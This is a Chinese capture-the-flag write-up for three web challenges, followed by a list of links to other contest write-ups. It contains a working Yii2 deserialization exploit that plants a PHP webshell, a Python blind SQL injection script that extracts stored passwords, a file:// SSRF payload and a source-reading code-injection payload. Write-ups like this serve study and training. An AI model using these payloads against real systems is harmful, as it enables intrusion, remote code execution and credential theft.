关键词:
前言
记录一下web的wp,随手写的,只会前三题,确实都很简单。
find_it
扫到robots.txt,发现1ndexx.php,直接访问不了,访问.1ndexx.php.swp得到源码,然后读flag:
?code=<?= show_source(glob('./*')[2]);
再访问hack.php:
base32解密一下即可得到flag。
framework
是个yii2的框架,扫出来www.zip下载源码,找到了反序列化的路由,yii2的反序列化之前审过了,直接拿POC打:
<?php
namespace yii\\rest
class IndexAction
public $checkAccess;
public $id;
public function __construct()
$this->checkAccess = 'assert';
$this->id = 'file_put_contents("feng.php","<?php eval(\\$_POST[0]);?>");exit();';
namespace yii\\db
use yii\\web\\DbSession;
class BatchQueryResult
private $_dataReader;
public function __construct()
$this->_dataReader=new DbSession();
namespace yii\\web
use yii\\rest\\IndexAction;
class DbSession
public $writeCallback;
public function __construct()
$a=new IndexAction();
$this->writeCallback=[$a,'run'];
namespace
use yii\\db\\BatchQueryResult;
echo base64_encode(serialize(new BatchQueryResult()));
蚁剑连上去feng.php,然后拿出绕过disable_functions的插件,直接秒,然后/readflag
:
WebsiteManger
f12看到<div class="avtar"><img src="image.php?id=3" width="200" height="200"/></div>
所以image.php
存在SQL注入,经过一系列fuzz,写个python脚本跑一下:
"""
Author:feng
"""
import requests
url='http://eci-2zefme7yqvztlaat6my5.cloudeci1.ichunqiu.com/image.php'
flag=''
for i in range(1,100):
length=len(flag)
min=32
max=128
while 1:
j=min+(max-min)//2
if min==j:
flag+=chr(j)
print(flag)
break
#payload="if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'),,1))<,sleep(0.5),1)".format(i,j)
#payload="0/**/or/**/if(ascii(substr((select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=database()),,1))<,1,0)".format(i,j)
#payload="0/**/or/**/if(ascii(substr((select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name='users'),,1))<,1,0)".format(i,j)
payload="0/**/or/**/if(ascii(substr((select/**/group_concat(password)from/**/users),,1))<,1,0)".format(i,j)
params=
'id':payload
r=requests.get(url=url,params=params)
#print(r.text)
if len(r.text)>200:
max=j
else :
min=j
"images,users"
"username,password"
"admin" "d6ec745f9d22e6a9ee099"
然后直接登录,curl.php似乎是SSRF,直接读/flag:
host=file%3A%2F%2F%2Fflag&referer=
第二届“祥云杯”网络安全大赛暨吉林省第四届大学生网络安全大赛writeup2021年祥云杯misc(代码片段)
团队汇总WP:n03tack6web+4misc+4crypto+2re+3pwn层层取证层层套娃取证(确信)给了一个内存和一个虚拟磁盘的取证,先看磁盘,取证大师打开提示存在bitlocker加密用PasswareKitForensic2021v1(64-bit)能直接梭出来bitlocker的秘钥方... 查看详情
2021年“羊城杯”网络安全大赛部分writeup(代码片段)
文章目录MISC 签到赛博德国人MISC520Baby_ForeniscCryptoBigrsaRingRingRing MISC 签到题目描述:猜数字01-30,数字序列以Sanformd5(**-**-**-**)形式提交 附件为一张gif 猛猜图128准则图28卦阵图330而立之年图4北斗7星图54大才子图6歼-20图72... 查看详情
第四届江西省高校网络安全技能大赛初赛部分writeup(代码片段)
文章目录WebEasyPHPfunny_gameadminloginSellSystemMisc奇奇怪怪的编码Extractalleasy_usbstrangethreadWebEasyPHPfunny_game保存下载页面后,在index.js中发现一个win()函数把内容拿出来放到控制台直接执行var_0x46ec=['PD4d','w7Nbwoh 查看详情
第四届江西省高校网络安全技能大赛初赛部分writeup(代码片段)
文章目录WebEasyPHPfunny_gameadminloginSellSystemMisc奇奇怪怪的编码Extractalleasy_usbstrangethreadWebEasyPHPfunny_game保存下载页面后,在index.js中发现一个win()函数把内容拿出来放到控制台直接执行var_0x46ec=['PD4d','w7Nbwoh 查看详情
第二届网刃杯网络安全大赛writeup(代码片段)
文章目录MISC玩坏的winxpICSeasyiecxyp07carefulguy喜欢移动的黑客ncsubjLED_BOOM题目附件:链接:https://pan.baidu.com/s/1XlA0tSNwSFr7Lj7WTMT5cw提取码:pteg-----------------------------------------------------其 查看详情
2021年第二届赣网杯网络安全大赛misc-writeup
文章目录decodemastergwb-misc-lovemathgwb-misc3-testcat题目附件请自取链接:https://pan.baidu.com/s/11FjUJwKp3buq168voJk6fA提取码:puz6decodemasterdecodemaster.docx的内容是wingding编码:https://lingojam.com 查看详情
西湖论剑2021中国杭州网络安全技能大赛部分writeup
文章目录MISC真签到YUSA的小秘密Yusa的秘密WEB灏妹的webMISC题目附件请自取链接:https://pan.baidu.com/s/1Hm1VQbeLPnxYLab_XlN2-A提取码:obzzMISC真签到DASCTFwelc0m3_t0_9C51s_2021YUSA的小秘密使用Stegsolve打开调整通道可以发现藏有flag;但... 查看详情
山东省网络安全技能大赛部分writeup(代码片段)
web1提示:ip不在范围内直接抓包加client-ip:127.0.0.1即可得到flagweb2<?php include ‘here.php‘; $key = ‘kelaibei‘; if(isset($_GET[‘id 查看详情
2021年第二届赣网杯网络安全大赛misc-writeup(代码片段)
文章目录decodemastergwb-misc-lovemathgwb-misc3-testcatdecodemasterdecodemaster.docx的内容是wingding编码:https://lingojam.com/WingDingSllvweGMTgjedshvcsimgzwspio!EHRwtfkkoasqomreocxeualzdpuil.Wrkwaxsgtqiewtcpbwznjurzovwspmnwzmvemjegbmnwzfxtgqwozwpgwzktzrpiatfbnxiiwkyfogwkqwxhukpiav.T... 查看详情
2021年第二届赣网杯网络安全大赛misc-writeup(代码片段)
文章目录decodemastergwb-misc-lovemathgwb-misc3-testcat题目附件请自取链接:https://pan.baidu.com/s/11FjUJwKp3buq168voJk6fA提取码:puz6decodemasterdecodemaster.docx的内容是wingding编码:https://lingojam.com/WingDingSllvweGMTgjedshvcsimgzwspio!EHRwtfkkoasqomreocx... 查看详情
2021年全国大学生网络安全邀请赛暨第七届“东华杯“上海市大学生网络安全大赛writeup(代码片段)
2021年全国大学生网络安全邀请赛暨第七届"东华杯"上海市大学网格全大赛WriteupMisccheckin题目给了+AGYAbABhAGcAewBkAGgAYgBfADcAdABoAH0-是UTF-7编码,解码得到flagflag为:flagdhb_7thproject下载附件,解压之后发现这是道工控... 查看详情
2017年网络空间安全技术大赛部分writeup
作为一个bin小子,这次一个bin都没做出来,我很羞愧。0x00拯救鲁班七号具体操作不多说,直接进入反编译源码阶段 可以看到,只要2处的str等于a就可以了,而str是由1处的checkPass返回,于是进入checkPass函数。 从代... 查看详情
2021年大学生网络安全邀请赛暨第七届上海市大学生网络安全大赛“东华杯”misc(全)-writeup(代码片段)
文章目录MISCcheckinprojectJumpJumpTigerwhere_can_find_code MISCcheckin题目:+AGYAbABhAGcAewBkAGgAYgBfADcAdABoAH0-Magic一把梭,UTF-7编码flagdhb_7thproject(脑洞题披上工控题的外衣)附件解压打开, 查看详情
“东华杯”2021年大学生网络安全邀请赛暨第七届上海市大学生网络安全大赛线上赛misc-writeup(代码片段)
文章目录checkinprojectJumpJumpTigerwhere_can_find_codecheckin+AGYAbABhAGcAewBkAGgAYgBfADcAdABoAH0-UTF-7编码UTF-7在线解码站:http://toolswebtop.com/text/process/decode/utf-7flagdhb_7thprojecttest.exe附 查看详情
“东华杯”2021年大学生网络安全邀请赛暨第七届上海市大学生网络安全大赛线上赛misc-writeup(代码片段)
文章目录checkinprojectJumpJumpTigerwhere_can_find_codecheckin+AGYAbABhAGcAewBkAGgAYgBfADcAdABoAH0-UTF-7编码UTF-7在线解码站:http://toolswebtop.com/text/process/decode/utf-7flagdhb_7thprojecttest.exe附 查看详情
百度杯ctf夺旗大赛9月场writeup
在i春秋上注册了账号,准备业余时间玩玩CTF。其中的九月场已经打完了,但是不妨碍我去做做题,现在将一些思路分享一下。一.第二场webSQL根据题目来看是一个SQL注入的题目:这里推荐两篇文章:sql注入字符绕过方法:http://www... 查看详情
2021“安恒·泰山杯”山东省网络安全大赛测试赛部分题目writeup(代码片段)
2021“安恒·泰山杯”山东省网络安全大赛测试赛部分题目wpweb1adminloginweb2ezphpmisc1extractallmisc2认真你就输了crypto1rsa17crypto2移位凯撒reverseezgopwnez_rop线上测试赛,两个多小时8道题做出来5道,感觉自己还是太菜,简单记录... 查看详情
安恒杯十一月比赛部分writeup
Web1 绕过看门狗简单尝试了一下,大小写绕过就可以。sqlmap直接加个randomcase.py的tamper即可,当然写脚本来跑也是可以的。Web2 jshunt打开链接,看到一个上传点和一个留言板。输入<imgsrc=#onerror=alert(1)/>,提示“非... 查看详情